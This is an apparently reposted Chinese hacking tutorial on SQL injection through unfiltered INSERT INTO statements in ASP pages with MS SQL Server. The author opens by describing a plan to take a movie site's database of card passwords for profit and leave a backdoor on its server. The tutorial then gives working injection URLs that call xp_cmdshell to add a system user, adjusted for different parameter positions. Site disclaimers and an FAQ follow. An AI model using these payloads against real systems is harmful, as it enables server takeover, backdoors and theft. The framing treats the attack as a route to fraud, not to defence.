巧用数据库insert Into进行入侵注入
刚才到了酷吧,坐在收银台旁边和收银的MM聊了几句话;
突然看到"电影影线"有张海报,上面写着:
凡是购买该站点卡密码最后一位数是6或7便可获赠面值5元的易卡一张;
我想,这个网站整个数据在我手里,我要是把那几十万张卡全拿去换钱不是发达了?
随即马上到他服务器把库拿下来,顺便在服务器上再留个后门;
在过程中有另一个想法便是本文的重要点;利用insert Into 进行注入。
=============================================
关于SQL注入,以前常用的或很多朋友所懂的也只不过是在select 语句中ID=变量未过产生的注入点,例如http://www.gzint.com/xxx.asp?id=1 ;exec master..xp_cmdshell "net user xiaomo aa /add"–
=============================================
我们可否利用insert Into Table的语句进行注入呢?
这样的话,我们可以在某某有漏洞的网站上填写QQ或Email或地址的地方执行任何命令了哦.
记得以前粗略地和"乱刀"讨论过,不过一直没有实际行动,刚才发现了一下,原来真的可以做到这一点。呵呵。举下例:
某个页面xiaomo.asp中有如下一句代码:
Conn.execute "insert into admin (adminid,password,logintimes,usertype,level) values (’1’,’1’,’1’,’1’,’"&Request("u")&"’)"
我们可以利用Request("U")未过滤的变量执行任意系统命令.
这段很简单,Request("U")在语句后面,直接提交:
http://localhost/xiaomo.asp?u=2’);exec master..xp_cmdshell "net user xiaomo aa /add"–
便可添加一个xiaomo密码为aa的系统用户
因为构造的代码变成了:
Conn.execute "insert into admin (adminid,password,logintimes,usertype,level) values (’1’,’1’,’1’,’1’,’2’);exec master..xp_cmdshell "net user xiaomo aa /add"–
当然理所当然地"正确"执行了。
=============================================
我们换个思路,如果页面中的漏洞代码是:
Conn.execute "insert into admin (adminid,password,logintimes,usertype,level) values (’"&Request("u")&"’,’1’,’1’,’1’,’1’)"
Request("u")跑到前面去了,这该怎么办呢?
其实也很简单,变通一下即可,提交:
http://localhost/xiaomo.asp?u=3’,’1’,’1’,’1’,’1’);exec master..xp_cmdshell "net user xiaomo aa /add"—-
看出来了没?第一个变量代表了要写入的所有变量,而后面就不而而至了,哈哈。。
但有个问题是,我们必须得知道对方语句是怎么写,利在检查指定程序漏洞时所应用
2. 分享目的仅供大家学习和交流,请不要用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布投稿,分享有金币奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务 请大家谅解!
5. 如有链接无法下载、失效或广告,请联系站长,可领回失去的金币,并额外有奖!
6. 如遇到加密压缩包,默认解压密码为"www.zyfx8.cn",如遇到无法解压的请联系管理员!
本站部分文章、资源来自互联网,版权归原作者及网站所有,如果侵犯了您的权利,请及时联系我站删除。免责声明
资源分享吧 » 巧用数据库insert Into进行入侵注入
常见问题FAQ
- 免费下载或者VIP会员专享资源能否直接商用?
- 本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
- 织梦模板使用说明
- 你下载的织梦模板并不包括DedeCMS使用授权,根据DedeCMS授权协议,除个人非盈利站点外,均需购买DedeCMS商业使用授权。购买地址: http://www.desdev.cn/service-dedecms.html